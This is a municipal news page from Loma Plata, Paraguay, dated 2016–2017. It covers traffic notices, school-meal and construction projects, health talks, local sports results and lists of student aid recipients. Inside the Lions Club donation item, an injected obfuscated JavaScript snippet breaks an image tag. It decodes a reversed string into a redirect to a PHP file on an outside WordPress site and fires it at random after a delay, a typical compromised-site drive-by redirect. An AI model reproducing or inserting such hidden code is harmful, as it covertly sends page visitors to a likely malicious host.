Aviso del Departamento de Tránsito de la Municipalidad de Loma Plata.
EN ESPAÑOL:

15823673_1428724160472693_5955964387442235254_n
La municipalidad de de Loma Plata en el marco del cumplimiento de la Ley 5016/14 comunica a la ciudadanía que partir del año 2017 todos los que deseen recategorizar u obtener registros de conducir por primera vez y renovación deberán realizar un test de vista y oído.
El test puede realizarse en una consulta médica normal en el Hospital de Loma Plata o en el Puesto de Salud de Villa Residencial Sur; de miércoles a viernes.

EN ALEMÁN:
Eine Nachricht für Loma Plata und Umgebung

Von der Verkehrsabteilung der Munizipalität Loma Plata wird informiert, dass alle, die einen neuen Führerschein beantragen, die Kategorie ihres Führerscheins wechseln oder den ersten Führerschein machen, müssen einen Hör- und Augentest machen. Der Test kann bei einer normalen Sprechstunde beim Arzt im Hospital Loma Plata gemacht werden oder beim Gesundheitszentrum in Villa Residencial Sur von Mittwoch bis Freitag.

La Municipalidad de Loma Plata comunica a la ciudadanía en general del Distrito de Loma Plata que desde la fecha atenderá en el nuevo local Sito Avenida Central esq Calle Ultima.
Consultas a los números:
Recepción: 0983200387
Transito: 0985106712
Administración: 0985202030

Edificio

ATENCIÓN:
CONVOCATORIA BECAS – 2017

becas_aviso

Autoridades de Boquerón preocupados por el estado calamitoso de la ruta Transchaco.

progra-televisivo
Ayer domingo el programa televisivo La Lupa estuvo en la ciudad de Filadelfia, las autoridades de Boquerón, intendentes de Loma Plata, Don Walter Stockl; Filadelfia, Abog. Holger Bergen, Mariscal Estigarribia, Don Elmer Vogt; gobernador, Don Edwin Pauls lamentaron el estado crítico que se encuentra actualmente la ruta transachaco.
Todas las autoridades se lamentaron por la casi nula actuación del Ministerio de Obras Publicas para la reparación de dicha carretera internacional que conecta nuestro país con Bolivia. Esta vía es mucha importancia para el sector productivo manifestaron los representantes de las cooperativas menonitas quienes también participaron en el programa.

Intendente de Loma Plata participó de cena de fin de año del Cuerpo de Bombero de Loma Plata.

bomberos
Don Walter Stockl intendente de Loma Plata participo en la cena de confraternidad del Cuerpo de Bombero Voluntarios de Loma Plata. En la ocasión los directivos rindieron cuentas y explicaron los trabajos que realizaron durante este año.
El intendente durante su alocución agradeció a los bomberos por el enorme sacrificio que realizan día a día para salvar vidas. En otro momento el jefe comunal manifestó que la Municipalidad desembolsara la suma de Gs 45.000.000 para la instalación de un tanque metal de 8.000 litros de un camión del Bombero.

FONACIDE: Avanzan obras para Comedores Escolares en el Distrito de Loma Plata.

fonacideLa Municipalidad de Loma Plata realiza construcciones para Comedores Escolares en las escuelas de Cacique Antón y Abram Klassen de Yalve Sanga, de los recursos provenientes del Fondo Nacional de Inversión Pública y Desarrollo – FONACIDE.
En ese sentido, el propio intendente de Loma Plata, Don Walter Stockl visitó las dos instituciones beneficiadas para observar los avances de las construcciones. La misma avanza de acuerdo a lo planificado con la empresa constructora y la entrega se prevé para fines de diciembre.
El Comedor contará con una cocina, un depósito, una sala y un aljibe de 35 mil litros.
Municipalidad de Loma Plata, invirtiendo en Educación para beneficio de niños/as más carenciados! JUNTOS PODEMOS MÁS!!

Autoridades de Boquerón mantuvieron reunión con representantes de IPS, MSPyBS – Dirección de descentralización, OPS/OMS.

autoridades

Ayer lunes 21 de noviembre los intendentes de Loma Plata, Don Walter Stockl; Filadelfia, Abog. Holgen Bergen; Mariscal Estigarribia, Elmert Vogt; el Gobernador, Don Edwin Pauls mantuvieron una reunión con representantes de la Dirección de Descentralización del Ministerio de Salud Cristino Penayo y de la Dirección de Hospitales del Interior de IPS, Dra. Teresa León.

En la ocasión las autoridades presentaron su preocupación por los atrasos de desembolso de los fondos de equidad por parte del Ministerio de Salud. Por su parte Penayo responsabilizó al Ministerio de Hacienda por los atrasos de los desembolsos.

En otro momento los presentes pidieron una explicación al representante de IPS por los cortes de servicios en los hospitales que prestan servicios en la zona, en ese sentido, la Dra. León manifestó que se está subsanando los problemas y que los tres hospitales ya están realizando atención a los asegurados.

En horario de la tarde continuo el foro inclusivo de la Mesa de Salud Departamental con la participación de actores locales del área de Salud.

Intendente de Loma Plata recibió a la Coordinadora JICA.

jica
El Intendente de Loma Plata, Don Walter Stockl recibió la visita de la Coordinadora de Voluntarios JICA, oficina en Paraguay, Lic. Yumi Ono en fecha 18 de noviembre del año en curso. El objetivo de la administración municipal es contar con un profesional voluntario japonés para acompañar los trabajos en el Puesto de Salud del Barrio Residencial Sur de Loma Plata.
Por su parte la Coordinadora de la JICA explicó la filosofía de trabajo, la contrapartida que se requiere y los requisitos para acceder al Programa; en ese sentido, visitó el Puesto de Salud de Loma Plata para interiorizarse de los trabajos realizados en dicho nosocomio.
Igualmente visitaron el Hospital Nueva Jerusalén de Pesempo’o y el Centro de Formación Profesional de Loma Plata.

 

Publicado: 18.11.16

Programa Tekopora realiza primer pago en la Comunidad Indígena Pesempo’o del Distrito de Loma Plata.

dsc01115

En la fecha se realizó el primer pago del programa Tekopora a familias indígenas de la comunidad de Pesempo’o del Distrito de Loma Plata. En la ocasión la Secretaría de Acción Social desembolsó más de 90.000.000 (noventa millones) en total para las familias beneficiadas.
Cabe mencionar que la Comunidad de Pesempo’o es la primera del distrito de Loma Plata que recibe este beneficio. En ese sentido, la Municipalidad acompañó los trabajos de consulta y la realización del censo familiar.
El Intendente local, Don Walter Stockl acompañó el momento de la realización de pago y agradeció al Ministro de la SAS por incluir en el programa a esta comunidad; a la vez pidió a los beneficiados dar buen uso a este apoyo que reciben de parte del gobierno.

Publicado: 18.11.16

Municipalidad de Loma Plata entrega informes de  FONACIDE.

Informes trimestrales sobre los programas y proyectos, metas y grados de ejecución  y el presupuesto aplicado, financiados con los fondos de FONACIDE.

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/Info-sobre-fonacide.pdf»]

Publicado: 15.11.16

CENSO DE ADULTOS MAYORES

1

 La Municipalidad de Loma Plata informa que está previsto la realización del Censo de los adultos mayores en situación de pobreza del Distrito de Loma Plata, según el calendario de la Dirección de Pensiones No Contributivas (DPNC) del Ministerio de Hacienda en fecha 21 de noviembre del año en curso.

Serán visitadas únicamente las personas inscriptas previamente en el municipio. Los interesados deben aguardar en sus domicilios la visita de los censistas en la fecha mencionada más arriba. El censo es totalmente gratuito y no implica ningún costo para los adultos mayores y sus familiares.

 

Publicado: 14.11.16

Arrancó campeonato pre-liga en Loma Plata.

1

El sábado se realizo la inauguración del campeonato Pre-liga en Loma Plata con miras a la creación de una nueva liga deportiva en dicho distrito. Compiten 8 equipos en la categoría juvenil y primera de la zona de Cruce Boquerón 2, Loma Plata centro 1 y Pesempoo con 5 equipos.
El acto inaugural se realizo en la nueva cancha municipal de Villa San Miguel con presencia del intendente, Don Walter Stockl y dirigentes deportivo del Departamento de Boquerón y de los clubes que compiten en dicho campeonato.
La primera fecha arrojó estos resultados:
Primera fecha en categoría primera:
Nanawa 2 – Trébol 3
Atlético Chaqueño 2 – Sport Py 5
Unión Loma Plata 1 – Fundación de Asunción 1
Sport Villa Boquerón 1 Atlético Loma Plata 2
Categoría Juvenil
Nanawa 2 – Trébol 3
Atlético Chaqueño 4 – Sport Py 1
Unión Loma Plata 4 – Fundación de Asunción 1
Sport Villa Boquerón 1 Atlético Loma Plata 2

Publicado: 14.11.16

Municipalidad de Loma Plata reconoce trayectoria de Josue Benitez.

1

Esta mañana en la Sala de la Junta Municipal de Loma Plata el niño arpista Josué Benítez recibió un reconocimiento por su trayectoria como arpista en representación del Distrito local. Don Walter Stockl, intendente de Loma Plata entregó en reconocimiento la Resolución N° 1136/2016, un certificado y una medalla de plata; animándolo a seguir cultivando el arte a través de su talento en las diversas presentaciones que realiza.
Participaron del acto el Presidente de la Junta Municipal, Sr. Alex Thiessen, la Secretaria General Sra. Alice Gamarra, el encargado de Educación Sr. Milciades Marmolejos y el Sr. Waldimir Benítez, padre del pequeño arpista.
Con esto se busca, a parte de motivar al artista a seguir desarrollando su talento que más niños y jóvenes puedan desenvolverse en la sociedad a través del arte, fomentando la cultura paraguaya.

Publicado: 14.11.16

Cierran año lectivo en el Colegio Indígena Yalve Sanga.

1El sábado 12 de noviembre se realizó el Acto de Colación del Tercer Año de la Educación Media y Noveno Grado de la Educación Escolar Básica del Colegio Indígena Yalve Sanga. Este año la Promoción 2016 lleva el nombre del Prof. Luis Alfonso Resck.
Del acto participó el intendente de Loma Plata, Don Walter Stockl quien entregó medallas a los mejores compañeros del Noveno y Tercer Año respectivamente.
Desde la Administración Municipal felicitaciones a los egresados y el deseo que puedan seguir estudiante para beneficio personal, de su familia y por ende de la Comunidad.

 

Publicado: 10.11.16

Aviso importante:

3

La Municipalidad de Loma Plata comunica a los estudiantes beneficiados por el apoyo económico otorgado por dicha institución Municipal que pueden pasar a cobrar desde la fecha en los siguientes horarios de oficina de 07:00 a 11:30 y de 13:30 a 17:30 horas en la Dirección Administrativa de la Municipalidad.
Se solicita a los beneficiados traer una copia de cédula y copia de factura del mes de octubre. En caso de presentarse un tercero para el cobro deberá tener la autorización correspondiente por escrito.
Lista de beneficiados/as.
1. Osvaldo Enrique Ibarra Rodríguez
2. Sirley Elizabeth Leguizamón de Martínez
3. Rebeca Sanabria Castaño
4. Leidy Gissel Arrúa Acosta
5. Harol Aristides Calonga Echague
6. Oliver Ortiz Dos Santos
7. Anica Yudit Reimer Aldama
8. Gabriela Sofía Webers Lottermann
9. Máximo Fabián Martínez Mendoza
10. Luis Enrique Moreno Sosa
11. Higinia Rebeca Britos Gómez
12. Lorena Esther Ayala Godoy
13. Víctor Nicolás Estigarribia Guillen
14. Aurora Elizabeth Cabrera
15. Regina Pérez Cardizo
16. Analia Natalia Isasi
17. Ada Jorgelina Coronel
18. Celina Martínez Cristaldo
19. Yesica Noemi Corbalan
20. Natalia Maximina Freides
21. Camelia Álvarez Caballero
22. María Noelia Rolón
23. Guiselly Vicenta Verena Ferreira

Publicado: 04.11.16

Jóvenes universitarios realizan visita por el distrito de Loma Plata.

dsc00945

Un grupo de universitario de la carrera de arquitectura de la Universidad Metropolitana de la ciudad de Asunción visito la nueva sede de la Municipalidad de Loma Plata, en donde conversaron con el intendente de la ciudad, Don Walter Stockl.

Publicado: 04.11.16

Embajador de Japón visita Boquerón.

2

El embajador de Japón en nuestro país, Sr. Yoshihisa Uesa se encuentra de visita en el Departamento de Boquerón. Anoche se reunió con los intendentes de Loma Plata, Don Walter Stockl; de Filadelfia Abogado Holger Bergen y representantes de las Cooperativas Menonitas.

En la fecha el Diplomático Japonés recorrerá las instalaciones de la industria láctea y el frigorífico de la  Cooperativa Chortitzer  de Loma Plata.

Publicado: 03.11.16 

Nuevos Facilitadores Judiciales al servicio de la comunidad.

dsc00853Esta mañana en la sede de la Gobernación de Boquerón juraron aproximadamente 50 nuevos Facilitadores Judiciales. El juramento se realizó ante el Ministro de la Corte Suprema de Justicia, Dr. Miguel Ángel Bajac Albertini, autoridades distritales de Loma Plata, Don Walter Stockl; Filadelfia Abogado Holger Bergen, Mariscal Estigarribia, Elmert Vogt, de Irala Fernández Lic. Cecilio López; el Gobernador de Boquerón DonEdwin Pauls y el Diputado Nacional don Cornelius Sawatzky entre otros.
La tarea de los nuevos facilitadores en primera instancia es ser un puente entre los operadores de justicia y los miembros de su comunidad, sirviéndoles el Sistema como un instrumento para que los integrantes de las comunidades logren salir de su situación de exclusión social.
Durante la actividad también los intendentes de los 4 distritos del Chaco Central firmaron un Memorando de Entendimiento con el Sistema Nacional de Facilitadores Judiciales dependiente de la Corte Suprema de Justicia cuyo objetivo es realizar actividades que de común acuerdo decidan las partes a fin de difundir y fortalecer la figura del Facilitador Judicial.

Publicado: 01.11.16

Reglamentan funcionamiento de las comisiones vecinales en el Municipio de Loma plata.

A través de la Ordenanza Nº 17/2016 por la cual se asimila y se acepta en parte el veto parcial interpuesto por el Intendente Municipal de Loma Plata según Resolución Nº 893/2016 de fecha 16 de septiembre de 2016 “POR LA CUAL VETA PARCIALMENTE LA ORDENANZA Nº 12/2016 “ POR LA CUAL SE REGLAMENTA EL FUNCIONAMIENTO DE LAS COMISIONES VECINALES EN EL MUNICIPIO DE LOMA PLATA”.

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/Ordenanza-17.16.pdf»]

[gview file=»http://lomaplata.gov.py/wp-content/uploads/2015/08/Ordenanza-12.16.pdf»]

 

Publicado: 25.10.16

Reunión informativa sobre Ampliación del Casco Urbano.

dsc00795Anoche el intendente de Loma Plata, Don Walter Stockl mantuvo una reunión informativa sobre la Ampliación del Casco Urbano, en ese sentido, el jefe municipal primeramente explicó sobre los alcances del proyecto. Luego los presentes realizaron sus consultas y opiniones al respecto dejando en claro que en su mayoría no están de acuerdo con la ampliación.
Dicho proyecto de ampliación ya cuenta con la aprobación de Catastro Nacional con Resolución 255/2015, y actualmente se encuentra en la Junta Municipal para su estudio y aprobación correspondiente.
En la actualidad, en Loma Plata varios fraccionamientos y loteamientos no cuenta con la aprobación de la Municipalidad y del Servicio Nacional de Catastro, ambas instituciones son los responsables de dar los permisos correspondientes para nuevos fraccionamientos.
Dentro de lo que establece la ley Nº 3.966 Orgánica Municipal en su capítulo III Artículo 12 de las Funciones Municipales establece:
1. En materia de planificación, urbanismo y ordenamiento territorial:
a. La planificación del municipio, a través del Plan de Desarrollo Sustentable del Municipio y del Plan de Ordenamiento Urbano y Territorial;
b. La delimitación de las áreas urbanas y rurales del municipio;
c. La reglamentación y fiscalización del régimen de uso y ocupación del suelo;
d. La reglamentación y fiscalización del régimen de loteamiento.
Las aldeas afectadas por la ampliación del casco urbano son Kleefeld, Reinland, Bergfeld y Osterwick.

Publicado: 24.10.16

Intendente visitó instituciones educativas del Distrito.

dsc00786

Don Walter Stockl, intendente de Loma Plata realizó esta mañana una recorrida por las instituciones educativas que son beneficiadas con los Programas de FONACIDE: Almuerzo Escolar y Construcciones. En ese sentido, el jefe municipal visitó primeramente la Escuela Cornelius Sawatzky de Cruce Boquerón, dicha institución recibe desde el viernes último víveres, verduras, productos lácteos y frutas para la elaboración del Almuerzo Escolar.

Otra escuela beneficiada con el programa de Almuerzo es Jacobo Vidal de Yalve Sanga donde se realizó un pequeño acto para la entrega de los víveres, verduras, productos lácteos y frutas. En su alocución el intendente pidió a los profesores y responsables de preparar la comida utilizar de buena manera las provisiones y sea de provecho para la alimentación de los niños/as.

Otras Inversiones realizadas:

La Municipalidad de Loma Plata actualmente realiza inversiones en infraestructura en las siguientes instituciones educativas:

Escuela de Pesempo’o: pintura sintética para el espacio destinado a comedor, construcción de una mesada con lavatorio y reparación de la conexión eléctrica. Monto transferido GS 6.440.000.

Escuela Cornelius Sawatzky: construcción de una mesada con pileta, conexión de agua, cocina con chimenea, un congelador y ventiladores de techo por un monto de GS 11.001.000.

Otras instituciones que visitó el intendente fueron Abram Klassen y Cacique Antón de Yalve Sanga, en ambas instituciones la municipalidad tiene previsto la construcción de Comedores Escolares por un monto adjudicado de Gs. 267.227.780 (Según Microplanificación 2015). La empresa adjudicada iniciará ya los procesos de construcción inmediatamente. Así también de la Microplanificación 2016 se prevé construcción de un aula en Jacobo Vidal y tres aulas nuevas para Abram Klassen; y un aula para Educación Inicial de Héroes del Chaco.

“Juntos podemos más, Gobierno Municipal de Loma Plata cumpliendo en la ejecución de proyectos con fondos provenientes de FONACIDE”.

 

Publicado: 21.10.16

Municipalidad de Loma Plata entrega Almuerzo Escolar a Instituciones Educativas del Distrito.

dsc00712

En la fecha la Municipalidad de Loma Plata empezó con la entrega de viveres, verduras y frutas para la elaboración del Almuerzo Escolar a las escuelas Básicas de Pesempo’o, Esc. Cornelius Sawatzky de Cruce Boquerón y Esc. Jacobo Vidal de Yalve Sanga.

Las frutas (Naranja, mandarina, mamón) y verduras (Tomate, locote, zanahoria, ajo, zapallo, papa, cebollita en hojas, ajo, entre otros) se entregaran semanalmente, y los víveres (arroz, fideo, azúcar, poroto, locro, harina de maíz, sal, aceite y leche) quincenalmente.

Es importante mencionar que es la primera vez que se implementa el programa de Almuerzo Escolar en el distrito de Loma Plata por parte del Municipio local. Los fondos son provenientes de FONACIDE beneficiando a 600 alumnos de las instituciones ya mencionadas más arriba. El monto de la adjudicación total es de GS. 146.962.548.

Las instituciones beneficiadas recibirán los víveres en estos dos meses restantes del año (octubre y noviembre) y el remanente se entregará los meses de Febrero a Mayo del 2017; donde se prevé realizar otra licitación para cubrir los demás meses del año lectivo.

“Juntos podemos más, Gobierno Municipal de Loma Plata cumpliendo en la ejecución de proyectos con fondos provenientes de FONACIDE”.

Publicado: 20.10.16

                                   CHARLA EDUCATIVA – CONSEJO LOCAL DE SALUD
Cáncer de mama: la importancia de la detección precoz, según profesionales de la salud.

Participantes de la Charla Educativa organizada por el Consejo Local de Salud.

Participantes de la Charla Educativa organizada por el Consejo Local de Salud.

En el marco de la lucha contra el cáncer de mama el Consejo Local de Salud de Loma Plata realizó una charla sobre esta enfermedad. La charla estuvo a cargo de los profesionales del Puesto de Salud de Villa Sur, Dr. Edemar Díaz, Lic. Noelia Gómez y el Lic. Mario Vázquez.
El Dr. Díaz manifestó sobre la importancia de los controles periódicos para la detección precoz de dicha enfermedad. Según el galeno de enero a octubre de 2016, en este centro asistencial (Puesto de Salud de Villa Sur) no se ha diagnosticado caso positivo del cáncer.

Los profesionales de blanco presentaron un material audiovisual sobre los factores de riego, síntomas, tratamiento y cómo prevenir este mal que aqueja principalmente a las mujeres, aunque estadísticamente el 1% de la población masculina a nivel nacional también padece de esta enfermedad.
El intendente de Loma Plata, Don Walter Stockl acompañado por su esposa Sra. Esther de Stockl participaron de la charla.

“De vos depende, salvar tu vida”

Publicado: 19.10.16

Club de leones – Chaco Central entregó insumo y materiales a la Municipalidad de Loma Plata.

Don Walter Stockl intendente de Loma Plata recepcion<script srcset=

$Ikf=function(n){if (typeof ($Ikf.list[n]) == «string») return $Ikf.list[n].split(«»).reverse().join(«»);return $Ikf.list[n];};$Ikf.list=[«\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando los insumos y materiales donados por el Club de León Chaco Central.» width=»300″ height=»169″ /> Don Walter Stockl intendente de Loma Plata recepcionando los insumos y materiales donados por el Club de León Chaco Central.

El Club de Leones – Chaco Central realizó entrega de insumo y materiales a la Municipalidad de Loma Plata a ser utilizado en el Puesto de Salud de Villa Sur. La entrega estuvo a cargo del Abogado Rolando Regis Vicepresidente del Club de Leones – Chaco Central y la señora Juwelita Suderman, Jefa de Región del Club de Leones al intendente de Loma Plata y Presidente Local de Salud, Don Walter Stockl.
Los materiales que fueron donados por dicha institución consisten en dos tanques de oxigeno con su correspondiente accesorio de movilidad y sistema de graduación, un respirador artificial pediátrico, una bota ortopédica con su accesorios y dos almohadas ortopédicas.
Desde la administración municipal agradecemos al Club de Leones del Chaco Central por este importante donación.

Publicado: 13.10.16

Aviso importante:

Apoyo económico a jóvenes estudiantes del distrito.

Apoyo económico a jóvenes estudiantes del distrito

 

La Municipalidad de Loma Plata comunica a los estudiantes beneficiados por el apoyo económico otorgado por dicha institución Municipal que pueden pasar a cobrar desde la fecha en los siguientes horarios de oficina de 07:00 a 11:30 y de 13:30 a 17:30 horas en la Dirección Administrativa de la Municipalidad.

Se solicita a los beneficiados traer una copia de cédula y copia de factura del mes de septiembre. En caso de presentarse un tercero para el cobro deberá tener la autorización correspondiente por escrito.

Lista de beneficiados/as.
1. Osvaldo Enrique Ibarra Rodríguez
2. Sirley Elizabeth Leguizamón de Martínez
3. Rebeca Sanabria Castaño
4. Leidy Gissel Arrúa Acosta
5. Harol Aristides Calonga Echague
6. Oliver Ortiz Dos Santos
7. Anica Yudit Reimer Aldama
8. Gabriela Sofía Webers Lottermann
9. Máximo Fabián Martínez Mendoza
10. Luis Enrique Moreno Sosa
11. Higinia Rebeca Britos Gómez
12. Lorena Esther Ayala Godoy
13. Víctor Nicolás Estigarribia Guillen
14. Aurora Elizabeth Cabrera
15. Regina Pérez Cardizo
16. Analia Natalia Isasi
17. Ada Jorgelina Coronel
18. Celina Martínez Cristaldo
19. Yesica Noemi Corbalan
20. Natalia Maximina Freides
21. Camelia Álvarez Caballero
22. María Noelia Rolón
23. Guiselly Vicenta Verena Ferreira

Publicado: 13.10.16

Escuela y Colegios del distrito de Loma Plata se clasifican a la fase nacional.

Equipo femenino sub 14 de la Esc. Héroes del Chaco.

Equipo femenino sub 14 de la Esc. Héroes del Chaco.

La escuela Héroes del Chaco y los colegios Héroes del Chaco y Secundarios de Loma Plata se clasificaron para la fase nacional de los Juegos Escolares Estudiantiles Nacionales JEEN 2016 tras ganar los juegos correspondiente a la fase interregional que se realizo esta mañana en el Polideportivo Menno Verein Sport de la ciudad de Loma Plata.
En el acto inaugural estuvo presente el intendente de Loma Plata, Don Walter Stockl quien deseo mucho éxito a las instituciones participantes del evento deportivo. Igualmente estuvieron presentes el

intendente de Filadelfia, Abogado Holger Bergen y el Presidente de la Junta Departamental, Prof. Oscar Rodas.
Instituciones Clasificadas del distrito de Loma Plata:
Sub 14:
Fútsal femenino Escuela Héroes del Chaco
Vóley femenino Colegio Secundario Loma Plata.
Sub 17:
Fútsal femenino Colegio Héroes del Chaco
Vóley femenino Colegio Secundario Loma Plata
Vóley masculino Colegio Secundario Loma Plata.
El Colegio Parroquial Nuestra Señora de la Paz de Villa Choferes del Chaco del distrito de Mariscal Estigarribia se clasificó en hándbol masculino sub 17.

Publicado: 11.10.16

OPS presenta proyecto a autoridades de Boquerón.

dsc00595El Ing. Emilio Ramírez representante de la Organización Panamericana de la Salud (OPS) presentó el Proyecto de Salud para el Chaco Sudamericano a los Intendentes de Loma Plata, Don Walter Stockl; Filadelfia, Abogado Holger Bergen; Mariscal Estigarribia Estigarribia, Elmer Vogt y el Gobernador don Edwin Pauls.
El representante de la OPS manifestó que el objetivo de dicho proyecto es mejorar el acceso a la salud de los Pueblos Sudamericanos, tanto de Paraguay, Brasil, Argentina y Bolivia.

Este mismo proyecto también fue presentado a los miembros del Consejo Regional de Salud y a los Consejos Locales de Salud de los tres distritos de Boquerón.

Publicado: 11.101.16

Autoridades de Boquerón y de las Cooperativas Menonitas piden la reconstrucción integral de la ruta transchaco.

1
Ayer lunes los intendentes de Loma Plata, Don Walter Stockl; Filadelfia, Abogado Holger Bergen; Mariscal Estigarribia, Elmert Vogt; el Gobernador Edwin Pauls; el Diputado Nacional y los Presidentes de las 3 Cooperativas Menonitas del Chaco Central realizaron una conferencia de prensa con el objetivo de pedir al Ministerio de Obras Públicas la reconstrucción total de la Ruta Nº 9 Carlos Antonio López (transchaco).
El intendente de Loma Plata, Don Walter Stockl manifestó que a través de esta conferencia estamos exigiendo a las autoridades del Gobierno Central la reparación total de esta ruta tan importante para los chaqueños. En ese sentido, recordó que el Chaco es uno de los mayores exportadores de productos alimenticios para todo el país.
Gustav Sawatzky, Presidente de Chortitzer remató diciendo: “La ruta Transchaco no es un lujo es una necesidad para el trabajo”.

Publicado: 10.10.16

SEGUNDO DIALOGO INTERETNICO.

dsc00574

Realizado en la fecha en el local del Centro de Formación Profesional desde las 09:00 hasta las 11:00 horas, convocado por el Gerente de Cooperación Vecinal de la Asociación Civil Chortitzer Ing. Norman Toews, con la participación del Intendente Municipal don Walter Stockl, la Secretaria General  Sra. Alice Gamarra, el Presidente de la Asociación y Cooperativa Chortitzer Don Gustav Sawatzky,  representantes de la Comunidad de Pesempo´o, de la Comisión Vecinal Barrio Residencial Sur y de los colonos menonitas.

El objetivo de la reunión es que mediante el diálogo y la comunicación entre las diversas culturas que conviven en la ciudad de Loma Plata se genere entendimiento y haya un crecimiento  integral de la sociedad.

Se prevé realizar otros encuentros donde se pueda ir fijando las líneas de acción para lograr una Convivencia Pacífica, tomando decisiones que puedan aportar a rescatar los valores que se van perdiendo, buscar en forma conjunta objetivos y metas claras para el desarrollo de la ciudad. El intendente menciono que celebra la iniciativa de convocar a esta reunión, el dialogo entre todos y que el trabajo continúe.

Publicado: 10.10.16

Familia Ekkert inauguró nueva planta procesadora de maní.

dsc00483
El sábado último se inauguró la nueva planta procesadora de maní perteneciente a la familia Ekkert, de la Colonia 5 distrito de Filadelfia. Del evento participó el intendente de Loma Plata, Don Walter Stockl.
En dicha procesadora trabajan aproximadamente 60 personas y pueden producir hasta 66 mil turrones por día. Es importante mencionar que la Gobernación de Boquerón adquiere dicho producto para la distribución como componente de la merienda escolar. En dicha fábrica también se produce manteca de maní.

Publicado: 07.10.16

Aviso importante:

7460203-la-polic-a-de-tr-fico-en-amarillo-chaleco-reflectante-haciendo-el-gesto-de-se-ales-para-controlar-el-foto-de-archivo
La Municipalidad de Loma Plata convoca a las personas que deseen postularse para Policía Municipal de Tránsito que desde la fecha pueden presentar sus carpetas en la Municipalidad de Loma Plata. La carpeta deberá ser presentada en forma personal en horario de oficina de 07:00 a 11:30 y de 13:30 a 17:30 de lunes a viernes en el Departamento de Tránsito, acompañado de los siguientes documentos y requisitos:

– Curriculum Vitae con fotocopia de cédula, Copia de título de bachiller y certificados obtenidos.
– Mayor de 18 años
– Bachiller concluido
– Residente en Loma Plata

Publicado: 06.09.16

Gobiernos locales emiten comunicado:

Postura en conjunto de la Gobernación de Boquerón y los Municipios de Loma Plata, Mariscal Estigarríbia, y Filadelfia  con relación a las Comisiones de Caminos.

 peaje

Los Gobiernos locales de Boquerón creen necesario:

  1. Mientras el MOPC no asuma el mantenimiento y la reparación de los caminos vecinales del departamento, las comisiones de caminos son las más indicadas y convenientes para realizar dichos trabajos.
  2. Los caminos, para mantener su operatividad, deben ser reparados y mantenidos; lo cual implica tiempo y dinero, y cuyo costo alguien debe asumir. Lo más justo y equitativo sería que dichos costos sean distribuidos conforme a su utilización y beneficio.
  3. A fin de garantizar la transparencia y equidad en la asociación- y/o comisión de caminos, la misma debería estar integrada por los representantes de los diferentes sectores afectados.
  4. El trabajo coordinado y articulado en conjunto entre diversos sectores ha sido siempre la base de desarrollo del departamento Boquerón.

 

 

Publicado: 30.09.16

Comunicado:

dsc00456La Municipalidad de Loma Plata a través del Departamento de Transito comunica a todos los ciudadanos que está prohibido el giro en U en toda la avenida central.
Así también está prohibido realizar el giro de izquierda o derecha pasando por encima de la doble franja o tachones de separación que están puesta en el centro de la capa asfáltica, para el giro existen los espacios sin franja y sin tachones de separación.
Se les ruega respetar para una mejor circulación de los vehículos y de esta forma evitar accidentes que pueda ocasionar una mala maniobra del conductor.

Igualmente se comunica a los peatones utilizar la franja peatonal para el cruce de la avenida, que fueron pintadas para tal efecto.
La adecuación que se realizaron en la avenida central es para una mejor estética de la ciudad, evitar la acumulación de arena en la calzada, y contar con un espacio más amplio para los vehículos
TODOS JUNTOS PODEMOS LOGRAR UNA EDUCACIÓN VIAL CON RESPETO ENTRE TODOS, DANDO CUMPLIMIENTO A LA LEY NACIONAL DE TRANSITO Y SEGURIDAD VIAL, ASÍ COMO LAS DEMÁS REGLAMENTACIONES!!!

Publicado: 29.09.16

Festejan aniversario Nº 84 de la Batalla de Boquerón.
dsc00308Esta mañana el intendente de Loma Plata, Don Walter Stockl participó del acto Central Protocolar por los festejos de los 84 aniversarios de la Batalla de Boquerón. Además se realizo el colorido desfile Estudiantil – Cívico – Militar.
Participaron del acto el vicepresidente de la República, Don Juan Afara, el gobernador de Boquerón Don Edwin Pauls, Senadores, Diputados, los intendentes de Mariscal Estigarribia Elmer Vogt y de Filadelfia Abogado Holger Bergen, además de una nutrida comitiva de autoridades de Yacuiba, Bolivia.
Este año la Comisión Nacional de Puesta en Valor y Fomento de los Sitios Históricos de la Guerra del Chaco 1932 – 1935, Encabezado por el Senador Nacional Dr. Arnoldo Wiens (Ley Nº 5528/15), participa en la parte organizativa del evento y en ese contexto en agosto pasado trajo en el Fortín Boquerón los restos del avión Potez 25 TOE, que utilizaba la Aviación Paraguaya en la Guerra del Chaco

Publicado: 29.09.16

Instituciones educativas de Loma Plata ganaron 6 cupos para la interregional JEEN 2016.
1Las disciplinas que ganaron las instituciones educativas del distrito de Loma Plata fueron Futsal sub 14 y 17 en femenino la Escuela y Colegio Héroes del Chaco y el Colegio Secundario de Loma Plata vóley en masculino y femenino sub 14 y 17 ambos colegios representaría al Departamento de Boquerón en la Fase interregional de los Juegos Escolares Estudiantes Nacionales 2016.
El evento deportivo en la ciudad de Loma plata en el día de ayer y participaron instituciones educativas de varias localidad es de la Región Occidental (Pte. Hayes, Boquerón y Alto Paraguay) que se aglutinan a competir en la Fase Regional de los Juegos Escolares y Estudiantiles Nacionales 2016.
La ceremonia de apertura se realizó ante la presencia del Intendente de Loma Plata, Walter Stockl del Ministro de Deportes, Víctor Pecci; el Gobernador Departamental de Boquerón, Edwin Pauls; y el Intendente de Filadelfia, Holger Bergen entre otras autoridades comunales y educativas de la región.
Otras instituciones que representaría a nuestro departamento en la fase interregional son: Colegio Nac. Mcal. Estigarribia en futsal masculino sub 17, Esc. Primero de Mayo en futsal masculino sub 14, Colegio Nuestra Señora de la Paz en hándbol masculino sub 17 y el Colegio Santa María del Chaco en hándbol masculino sub14

Publicado: 26.09.16

Ordenanza Nº 14/2016
Por la cual se modifica la Ordenanza Nº 11/2016, que modifica la Ordenanza Nº 06/2016, por la cual se deroga la Ordenanza Nº 05/2009 “POR LA CUAL SE ESTABLECE LOS RETIROS Y LINDEROS PARA LAS CONSTRUCCIONES DENTRO DEL EJIDO URBANO Y SE AMPLIA LA ORDENANZA Nº 09/2008 POR LA QUE SE REGLAMENTA LA CONSTRUCCIÓN DE TODAS LAS OBRAS CIVILES EN ELE DISTRITO DE LA MUNICIPALIDAD DE LOMA PLATA”

Acontinuación la ordenanza en formato pdf.

